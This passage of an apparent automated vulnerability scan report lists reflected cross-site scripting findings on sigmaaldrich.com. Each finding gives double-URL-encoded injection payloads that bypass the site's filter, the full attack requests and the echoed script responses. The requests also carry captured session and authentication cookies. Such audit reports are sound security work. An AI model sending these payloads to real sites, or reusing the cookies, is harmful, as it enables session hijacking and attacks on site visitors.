WC_USERACTIVITY_12688282=12688282%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c%2fDyB5eRHFA%2bjiqW4fJvzmKPtEcdXrV5ecHNw0Pgsx1dermxT7hun4Mp5L3tbS6qXEv%2bxu6VVuMsn%0ajem5P%2fgEKwOWIyMEiDRVS9%2bU3VER9BLZ3uDGRWY6GwmgFhDMc1XWItVfh6cs1hfOmNKlRwB8Cg%3d%3d; WC_AUTHENTICATION_12688282=12688282%2cn%2fwS3RmSOP4z5mMk9PYuUs6D%2bw8%3d; WC_AUTHENTICATION_12688281=12688281%2cPqNUHeCIPVUUoZVrbxhzbEz1zkE%3d; WC_SESSION_ESTABLISHED=true; fsr.a=1289930606627; ClientId=CagITBFY3-vqdi-sO6cxLUa; country=USA; SialLocaleDef=WebLang~-1|CountryCode~US|; 
bn_ec=%7B%22a%22%3A%22c%22%2C%22c%22%3A%22d%26g%26s%22%2C%22d%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fcustomer-service%2Fservices.html%22%2C%22r%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Ftechnical-service-home%2Fproduct-catalog.html%22%2C%22t%22%3A1289930598312%2C%22u%22%3A%226923287736776754713%22%2C%22dd%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fconfigurator%2Fservlet%2FDesignCenter%22%2C%22l%22%3A%22Custom%20Products%22%2C%22de%22%3A%7B%22ti%22%3A%22Services%20%7C%20Sigma-Aldrich%C2%AE%20Corporation%22%2C%22nw%22%3A344%2C%22nl%22%3A92%7D%7D; bn_u=6923287736776754713; cmTPSet=Y; WC_ACTIVEPOINTER=%2d1%2c11001;

Response (redirected)

HTTP/1.1 404 Not Found
Server: IBM_HTTP_Server/6.0.2.41 Apache/2.0.47 (Unix) Communique/4.0.2 mod_jk/1.2.28
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa PSAo PSDo CONi TELi OUR DELa BUS IND PHY ONL UNI PUR COM NAV DEM STA"
Host: 141.247.173.160:4402
Content-Type: text/html; charset=utf-8
Date: Tue, 16 Nov 2010 18:06:38 GMT
Content-Length: 29019
Connection: close
Set-Cookie: JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76;Path=/


                <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns=
...[SNIP]...
<script language="JavaScript1.1">
       cmCreateErrorTag("Error 404 | http://www.sigmaaldrich.com:4402/etc/medialib/docsbea80";alert(1)//f4e4d5d292a/Sigma/General_Information/vol_issue22_proteoprep20.Par.0001.File.tmp/vol_issue22_proteoprep20.pdf","E404") ;
   </script>
...[SNIP]...

1.330. http://www.sigmaaldrich.com/etc/medialib/docs/Sigma/General_Information/vol_issue22_proteoprep20.Par.0001.File.tmp/vol_issue22_proteoprep20.pdf [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.sigmaaldrich.com
Path:   /etc/medialib/docs/Sigma/General_Information/vol_issue22_proteoprep20.Par.0001.File.tmp/vol_issue22_proteoprep20.pdf

Issue detail

The value of REST URL parameter 4 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 54dd7%2522%253balert%25281%2529%252f%252fef9e5e5d4d4 was submitted in the REST URL parameter 4. This input was echoed as 54dd7";alert(1)//ef9e5e5d4d4 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. There is probably no need to perform a second URL-decode of the value of REST URL parameter 4 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /etc/medialib/docs/Sigma54dd7%2522%253balert%25281%2529%252f%252fef9e5e5d4d4/General_Information/vol_issue22_proteoprep20.Par.0001.File.tmp/vol_issue22_proteoprep20.pdf HTTP/1.1
Host: www.sigmaaldrich.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: WC_USERACTIVITY_12688283=12688283%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cZN%2bsQB36I3vUmE4Rx7cst5Zb7eFAVVKZZbU8Q6NXWL2ma01C4z8eXRe8KP%2b8%2fxa11nRsxJK9NLMS%0aryTTanv1yPfnuJk3YsswgrT6USqlqw1nF07uqQKEKFEfK8DyMuTvKLsQRZeesWLYgzw7OyiE9A%3d%3d; JSESSIONID2=0000CagITBFY3-vqdi-sO6cxLUa:12htm1uod; WC_USERACTIVITY_12688281=12688281%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c0iTkD05%2bJ%2fKBmcBh6LsH5XNZ0XmeCJHsSEZeUo2jUAh2B3dd%2fmMHH6p7Nw5FcdMZw339ce%2fd1dZs%0a0m3CH%2b4x2yWxyX56lBqUnCPe8iiIEgs4vnASJr6ngEo%2f%2fQiIWZNJeammXJARpeTHfZXS3dnk9A%3d%3d; JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76; cmRS=t3=1289930598515&pi=/customer-service/services.html; fsr.s={"cp":{"COUNTRY":"USA","REGION":"USA","ClientId":"CagITBFY3-vqdi-sO6cxLUa","MemberId":"12688283","SiteId":"SA"},"v":1,"rid":"1289930575583_437774","pv":5,"to":2.6,"c":"http://www.sigmaaldrich.com/customer-service/services.html","lc":{"d0":{"v":5,"s":true}},"cd":0,"sd":0,"f":1289930598515}; WC_AUTHENTICATION_12688283=12688283%2cOm93j7omM3TWI7o%2fgJL9qiznixo%3d; WC_USERACTIVITY_12688282=12688282%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c%2fDyB5eRHFA%2bjiqW4fJvzmKPtEcdXrV5ecHNw0Pgsx1dermxT7hun4Mp5L3tbS6qXEv%2bxu6VVuMsn%0ajem5P%2fgEKwOWIyMEiDRVS9%2bU3VER9BLZ3uDGRWY6GwmgFhDMc1XWItVfh6cs1hfOmNKlRwB8Cg%3d%3d; WC_AUTHENTICATION_12688282=12688282%2cn%2fwS3RmSOP4z5mMk9PYuUs6D%2bw8%3d; WC_AUTHENTICATION_12688281=12688281%2cPqNUHeCIPVUUoZVrbxhzbEz1zkE%3d; WC_SESSION_ESTABLISHED=true; fsr.a=1289930606627; ClientId=CagITBFY3-vqdi-sO6cxLUa; country=USA; SialLocaleDef=WebLang~-1|CountryCode~US|; 
bn_ec=%7B%22a%22%3A%22c%22%2C%22c%22%3A%22d%26g%26s%22%2C%22d%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fcustomer-service%2Fservices.html%22%2C%22r%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Ftechnical-service-home%2Fproduct-catalog.html%22%2C%22t%22%3A1289930598312%2C%22u%22%3A%226923287736776754713%22%2C%22dd%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fconfigurator%2Fservlet%2FDesignCenter%22%2C%22l%22%3A%22Custom%20Products%22%2C%22de%22%3A%7B%22ti%22%3A%22Services%20%7C%20Sigma-Aldrich%C2%AE%20Corporation%22%2C%22nw%22%3A344%2C%22nl%22%3A92%7D%7D; bn_u=6923287736776754713; cmTPSet=Y; WC_ACTIVEPOINTER=%2d1%2c11001;

Response (redirected)

HTTP/1.1 404 Not Found
Server: IBM_HTTP_Server/6.0.2.41 Apache/2.0.47 (Unix) Communique/4.0.2 mod_jk/1.2.28
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa PSAo PSDo CONi TELi OUR DELa BUS IND PHY ONL UNI PUR COM NAV DEM STA"
Host: stlwcmprd01.sial.com:4402
Content-Type: text/html; charset=utf-8
Date: Tue, 16 Nov 2010 18:06:45 GMT
Content-Length: 29019
Connection: close
Set-Cookie: JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76;Path=/


                <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns=
...[SNIP]...
<script language="JavaScript1.1">
       cmCreateErrorTag("Error 404 | http://www.sigmaaldrich.com:4402/etc/medialib/docs/Sigma54dd7";alert(1)//ef9e5e5d4d4/General_Information/vol_issue22_proteoprep20.Par.0001.File.tmp/vol_issue22_proteoprep20.pdf","E404") ;
   </script>
...[SNIP]...

1.331. http://www.sigmaaldrich.com/etc/medialib/docs/Sigma/General_Information/vol_issue22_proteoprep20.Par.0001.File.tmp/vol_issue22_proteoprep20.pdf [REST URL parameter 5]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.sigmaaldrich.com
Path:   /etc/medialib/docs/Sigma/General_Information/vol_issue22_proteoprep20.Par.0001.File.tmp/vol_issue22_proteoprep20.pdf

Issue detail

The value of REST URL parameter 5 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload a6828%2522%253balert%25281%2529%252f%252f37dfc2a246 was submitted in the REST URL parameter 5. This input was echoed as a6828";alert(1)//37dfc2a246 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. There is probably no need to perform a second URL-decode of the value of REST URL parameter 5 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /etc/medialib/docs/Sigma/General_Informationa6828%2522%253balert%25281%2529%252f%252f37dfc2a246/vol_issue22_proteoprep20.Par.0001.File.tmp/vol_issue22_proteoprep20.pdf HTTP/1.1
Host: www.sigmaaldrich.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: WC_USERACTIVITY_12688283=12688283%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cZN%2bsQB36I3vUmE4Rx7cst5Zb7eFAVVKZZbU8Q6NXWL2ma01C4z8eXRe8KP%2b8%2fxa11nRsxJK9NLMS%0aryTTanv1yPfnuJk3YsswgrT6USqlqw1nF07uqQKEKFEfK8DyMuTvKLsQRZeesWLYgzw7OyiE9A%3d%3d; JSESSIONID2=0000CagITBFY3-vqdi-sO6cxLUa:12htm1uod; WC_USERACTIVITY_12688281=12688281%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c0iTkD05%2bJ%2fKBmcBh6LsH5XNZ0XmeCJHsSEZeUo2jUAh2B3dd%2fmMHH6p7Nw5FcdMZw339ce%2fd1dZs%0a0m3CH%2b4x2yWxyX56lBqUnCPe8iiIEgs4vnASJr6ngEo%2f%2fQiIWZNJeammXJARpeTHfZXS3dnk9A%3d%3d; JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76; cmRS=t3=1289930598515&pi=/customer-service/services.html; fsr.s={"cp":{"COUNTRY":"USA","REGION":"USA","ClientId":"CagITBFY3-vqdi-sO6cxLUa","MemberId":"12688283","SiteId":"SA"},"v":1,"rid":"1289930575583_437774","pv":5,"to":2.6,"c":"http://www.sigmaaldrich.com/customer-service/services.html","lc":{"d0":{"v":5,"s":true}},"cd":0,"sd":0,"f":1289930598515}; WC_AUTHENTICATION_12688283=12688283%2cOm93j7omM3TWI7o%2fgJL9qiznixo%3d; WC_USERACTIVITY_12688282=12688282%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c%2fDyB5eRHFA%2bjiqW4fJvzmKPtEcdXrV5ecHNw0Pgsx1dermxT7hun4Mp5L3tbS6qXEv%2bxu6VVuMsn%0ajem5P%2fgEKwOWIyMEiDRVS9%2bU3VER9BLZ3uDGRWY6GwmgFhDMc1XWItVfh6cs1hfOmNKlRwB8Cg%3d%3d; WC_AUTHENTICATION_12688282=12688282%2cn%2fwS3RmSOP4z5mMk9PYuUs6D%2bw8%3d; WC_AUTHENTICATION_12688281=12688281%2cPqNUHeCIPVUUoZVrbxhzbEz1zkE%3d; WC_SESSION_ESTABLISHED=true; fsr.a=1289930606627; ClientId=CagITBFY3-vqdi-sO6cxLUa; country=USA; SialLocaleDef=WebLang~-1|CountryCode~US|; 
bn_ec=%7B%22a%22%3A%22c%22%2C%22c%22%3A%22d%26g%26s%22%2C%22d%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fcustomer-service%2Fservices.html%22%2C%22r%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Ftechnical-service-home%2Fproduct-catalog.html%22%2C%22t%22%3A1289930598312%2C%22u%22%3A%226923287736776754713%22%2C%22dd%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fconfigurator%2Fservlet%2FDesignCenter%22%2C%22l%22%3A%22Custom%20Products%22%2C%22de%22%3A%7B%22ti%22%3A%22Services%20%7C%20Sigma-Aldrich%C2%AE%20Corporation%22%2C%22nw%22%3A344%2C%22nl%22%3A92%7D%7D; bn_u=6923287736776754713; cmTPSet=Y; WC_ACTIVEPOINTER=%2d1%2c11001;

Response (redirected)

HTTP/1.1 404 Not Found
Server: IBM_HTTP_Server/6.0.2.41 Apache/2.0.47 (Unix) Communique/4.0.2 mod_jk/1.2.28
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa PSAo PSDo CONi TELi OUR DELa BUS IND PHY ONL UNI PUR COM NAV DEM STA"
Host: 141.247.173.160:4402
Content-Type: text/html; charset=utf-8
Date: Tue, 16 Nov 2010 18:06:47 GMT
Content-Length: 29018
Connection: close
Set-Cookie: JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76;Path=/


                <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns=
...[SNIP]...
<script language="JavaScript1.1">
       cmCreateErrorTag("Error 404 | http://www.sigmaaldrich.com:4402/etc/medialib/docs/Sigma/General_Informationa6828";alert(1)//37dfc2a246/vol_issue22_proteoprep20.Par.0001.File.tmp/vol_issue22_proteoprep20.pdf","E404") ;
   </script>
...[SNIP]...

1.332. http://www.sigmaaldrich.com/etc/medialib/docs/Sigma/General_Information/vol_issue22_proteoprep20.Par.0001.File.tmp/vol_issue22_proteoprep20.pdf [REST URL parameter 6]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.sigmaaldrich.com
Path:   /etc/medialib/docs/Sigma/General_Information/vol_issue22_proteoprep20.Par.0001.File.tmp/vol_issue22_proteoprep20.pdf

Issue detail

The value of REST URL parameter 6 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 26eab%2522%253balert%25281%2529%252f%252f8e4dd57ad27 was submitted in the REST URL parameter 6. This input was echoed as 26eab";alert(1)//8e4dd57ad27 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. There is probably no need to perform a second URL-decode of the value of REST URL parameter 6 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /etc/medialib/docs/Sigma/General_Information/26eab%2522%253balert%25281%2529%252f%252f8e4dd57ad27/vol_issue22_proteoprep20.pdf HTTP/1.1
Host: www.sigmaaldrich.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: WC_USERACTIVITY_12688283=12688283%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cZN%2bsQB36I3vUmE4Rx7cst5Zb7eFAVVKZZbU8Q6NXWL2ma01C4z8eXRe8KP%2b8%2fxa11nRsxJK9NLMS%0aryTTanv1yPfnuJk3YsswgrT6USqlqw1nF07uqQKEKFEfK8DyMuTvKLsQRZeesWLYgzw7OyiE9A%3d%3d; JSESSIONID2=0000CagITBFY3-vqdi-sO6cxLUa:12htm1uod; WC_USERACTIVITY_12688281=12688281%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c0iTkD05%2bJ%2fKBmcBh6LsH5XNZ0XmeCJHsSEZeUo2jUAh2B3dd%2fmMHH6p7Nw5FcdMZw339ce%2fd1dZs%0a0m3CH%2b4x2yWxyX56lBqUnCPe8iiIEgs4vnASJr6ngEo%2f%2fQiIWZNJeammXJARpeTHfZXS3dnk9A%3d%3d; JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76; cmRS=t3=1289930598515&pi=/customer-service/services.html; fsr.s={"cp":{"COUNTRY":"USA","REGION":"USA","ClientId":"CagITBFY3-vqdi-sO6cxLUa","MemberId":"12688283","SiteId":"SA"},"v":1,"rid":"1289930575583_437774","pv":5,"to":2.6,"c":"http://www.sigmaaldrich.com/customer-service/services.html","lc":{"d0":{"v":5,"s":true}},"cd":0,"sd":0,"f":1289930598515}; WC_AUTHENTICATION_12688283=12688283%2cOm93j7omM3TWI7o%2fgJL9qiznixo%3d; WC_USERACTIVITY_12688282=12688282%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c%2fDyB5eRHFA%2bjiqW4fJvzmKPtEcdXrV5ecHNw0Pgsx1dermxT7hun4Mp5L3tbS6qXEv%2bxu6VVuMsn%0ajem5P%2fgEKwOWIyMEiDRVS9%2bU3VER9BLZ3uDGRWY6GwmgFhDMc1XWItVfh6cs1hfOmNKlRwB8Cg%3d%3d; WC_AUTHENTICATION_12688282=12688282%2cn%2fwS3RmSOP4z5mMk9PYuUs6D%2bw8%3d; WC_AUTHENTICATION_12688281=12688281%2cPqNUHeCIPVUUoZVrbxhzbEz1zkE%3d; WC_SESSION_ESTABLISHED=true; fsr.a=1289930606627; ClientId=CagITBFY3-vqdi-sO6cxLUa; country=USA; SialLocaleDef=WebLang~-1|CountryCode~US|; 
bn_ec=%7B%22a%22%3A%22c%22%2C%22c%22%3A%22d%26g%26s%22%2C%22d%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fcustomer-service%2Fservices.html%22%2C%22r%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Ftechnical-service-home%2Fproduct-catalog.html%22%2C%22t%22%3A1289930598312%2C%22u%22%3A%226923287736776754713%22%2C%22dd%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fconfigurator%2Fservlet%2FDesignCenter%22%2C%22l%22%3A%22Custom%20Products%22%2C%22de%22%3A%7B%22ti%22%3A%22Services%20%7C%20Sigma-Aldrich%C2%AE%20Corporation%22%2C%22nw%22%3A344%2C%22nl%22%3A92%7D%7D; bn_u=6923287736776754713; cmTPSet=Y; WC_ACTIVEPOINTER=%2d1%2c11001;

Response (redirected)

HTTP/1.1 404 Not Found
Server: IBM_HTTP_Server/6.0.2.41 Apache/2.0.47 (Unix) Communique/4.0.2 mod_jk/1.2.28
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa PSAo PSDo CONi TELi OUR DELa BUS IND PHY ONL UNI PUR COM NAV DEM STA"
Host: 141.247.173.160:4402
Content-Type: text/html; charset=utf-8
Date: Tue, 16 Nov 2010 18:06:49 GMT
Content-Length: 28977
Connection: close
Set-Cookie: JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76;Path=/


                <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns=
...[SNIP]...
<script language="JavaScript1.1">
       cmCreateErrorTag("Error 404 | http://www.sigmaaldrich.com:4402/etc/medialib/docs/Sigma/General_Information/26eab";alert(1)//8e4dd57ad27/vol_issue22_proteoprep20.pdf","E404") ;
   </script>
...[SNIP]...

1.333. http://www.sigmaaldrich.com/etc/medialib/labware/labware-icons/air-sensitive-handling [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.sigmaaldrich.com
Path:   /etc/medialib/labware/labware-icons/air-sensitive-handling

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload f4faa%2522%253balert%25281%2529%252f%252fd3f5923e2a was submitted in the REST URL parameter 1. This input was echoed as f4faa";alert(1)//d3f5923e2a in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. There is probably no need to perform a second URL-decode of the value of REST URL parameter 1 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /etcf4faa%2522%253balert%25281%2529%252f%252fd3f5923e2a/medialib/labware/labware-icons/air-sensitive-handling HTTP/1.1
Host: www.sigmaaldrich.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: WC_USERACTIVITY_12688283=12688283%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cZN%2bsQB36I3vUmE4Rx7cst5Zb7eFAVVKZZbU8Q6NXWL2ma01C4z8eXRe8KP%2b8%2fxa11nRsxJK9NLMS%0aryTTanv1yPfnuJk3YsswgrT6USqlqw1nF07uqQKEKFEfK8DyMuTvKLsQRZeesWLYgzw7OyiE9A%3d%3d; JSESSIONID2=0000CagITBFY3-vqdi-sO6cxLUa:12htm1uod; WC_USERACTIVITY_12688281=12688281%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c0iTkD05%2bJ%2fKBmcBh6LsH5XNZ0XmeCJHsSEZeUo2jUAh2B3dd%2fmMHH6p7Nw5FcdMZw339ce%2fd1dZs%0a0m3CH%2b4x2yWxyX56lBqUnCPe8iiIEgs4vnASJr6ngEo%2f%2fQiIWZNJeammXJARpeTHfZXS3dnk9A%3d%3d; JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76; cmRS=t3=1289930598515&pi=/customer-service/services.html; fsr.s={"cp":{"COUNTRY":"USA","REGION":"USA","ClientId":"CagITBFY3-vqdi-sO6cxLUa","MemberId":"12688283","SiteId":"SA"},"v":1,"rid":"1289930575583_437774","pv":5,"to":2.6,"c":"http://www.sigmaaldrich.com/customer-service/services.html","lc":{"d0":{"v":5,"s":true}},"cd":0,"sd":0,"f":1289930598515}; WC_AUTHENTICATION_12688283=12688283%2cOm93j7omM3TWI7o%2fgJL9qiznixo%3d; WC_USERACTIVITY_12688282=12688282%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c%2fDyB5eRHFA%2bjiqW4fJvzmKPtEcdXrV5ecHNw0Pgsx1dermxT7hun4Mp5L3tbS6qXEv%2bxu6VVuMsn%0ajem5P%2fgEKwOWIyMEiDRVS9%2bU3VER9BLZ3uDGRWY6GwmgFhDMc1XWItVfh6cs1hfOmNKlRwB8Cg%3d%3d; WC_AUTHENTICATION_12688282=12688282%2cn%2fwS3RmSOP4z5mMk9PYuUs6D%2bw8%3d; WC_AUTHENTICATION_12688281=12688281%2cPqNUHeCIPVUUoZVrbxhzbEz1zkE%3d; WC_SESSION_ESTABLISHED=true; fsr.a=1289930606627; ClientId=CagITBFY3-vqdi-sO6cxLUa; country=USA; SialLocaleDef=WebLang~-1|CountryCode~US|; 
bn_ec=%7B%22a%22%3A%22c%22%2C%22c%22%3A%22d%26g%26s%22%2C%22d%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fcustomer-service%2Fservices.html%22%2C%22r%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Ftechnical-service-home%2Fproduct-catalog.html%22%2C%22t%22%3A1289930598312%2C%22u%22%3A%226923287736776754713%22%2C%22dd%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fconfigurator%2Fservlet%2FDesignCenter%22%2C%22l%22%3A%22Custom%20Products%22%2C%22de%22%3A%7B%22ti%22%3A%22Services%20%7C%20Sigma-Aldrich%C2%AE%20Corporation%22%2C%22nw%22%3A344%2C%22nl%22%3A92%7D%7D; bn_u=6923287736776754713; cmTPSet=Y; WC_ACTIVEPOINTER=%2d1%2c11001;

Response (redirected)

HTTP/1.1 404 Not Found
Server: IBM_HTTP_Server/6.0.2.41 Apache/2.0.47 (Unix) Communique/4.0.2 mod_jk/1.2.28
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa PSAo PSDo CONi TELi OUR DELa BUS IND PHY ONL UNI PUR COM NAV DEM STA"
Host: stlwcmprd01.sial.com:4402
Content-Type: text/html; charset=utf-8
Date: Tue, 16 Nov 2010 18:06:42 GMT
Content-Length: 28960
Connection: close
Set-Cookie: JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76;Path=/


                <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns=
...[SNIP]...
<script language="JavaScript1.1">
       cmCreateErrorTag("Error 404 | http://www.sigmaaldrich.com:4402/etcf4faa";alert(1)//d3f5923e2a/medialib/labware/labware-icons/air-sensitive-handling","E404") ;
   </script>
...[SNIP]...

1.334. http://www.sigmaaldrich.com/etc/medialib/labware/labware-icons/air-sensitive-handling [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.sigmaaldrich.com
Path:   /etc/medialib/labware/labware-icons/air-sensitive-handling

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 83254%2522%253balert%25281%2529%252f%252fcf3dc4590d was submitted in the REST URL parameter 2. This input was echoed as 83254";alert(1)//cf3dc4590d in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. There is probably no need to perform a second URL-decode of the value of REST URL parameter 2 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /etc/medialib83254%2522%253balert%25281%2529%252f%252fcf3dc4590d/labware/labware-icons/air-sensitive-handling HTTP/1.1
Host: www.sigmaaldrich.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: WC_USERACTIVITY_12688283=12688283%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cZN%2bsQB36I3vUmE4Rx7cst5Zb7eFAVVKZZbU8Q6NXWL2ma01C4z8eXRe8KP%2b8%2fxa11nRsxJK9NLMS%0aryTTanv1yPfnuJk3YsswgrT6USqlqw1nF07uqQKEKFEfK8DyMuTvKLsQRZeesWLYgzw7OyiE9A%3d%3d; JSESSIONID2=0000CagITBFY3-vqdi-sO6cxLUa:12htm1uod; WC_USERACTIVITY_12688281=12688281%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c0iTkD05%2bJ%2fKBmcBh6LsH5XNZ0XmeCJHsSEZeUo2jUAh2B3dd%2fmMHH6p7Nw5FcdMZw339ce%2fd1dZs%0a0m3CH%2b4x2yWxyX56lBqUnCPe8iiIEgs4vnASJr6ngEo%2f%2fQiIWZNJeammXJARpeTHfZXS3dnk9A%3d%3d; JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76; cmRS=t3=1289930598515&pi=/customer-service/services.html; fsr.s={"cp":{"COUNTRY":"USA","REGION":"USA","ClientId":"CagITBFY3-vqdi-sO6cxLUa","MemberId":"12688283","SiteId":"SA"},"v":1,"rid":"1289930575583_437774","pv":5,"to":2.6,"c":"http://www.sigmaaldrich.com/customer-service/services.html","lc":{"d0":{"v":5,"s":true}},"cd":0,"sd":0,"f":1289930598515}; WC_AUTHENTICATION_12688283=12688283%2cOm93j7omM3TWI7o%2fgJL9qiznixo%3d; 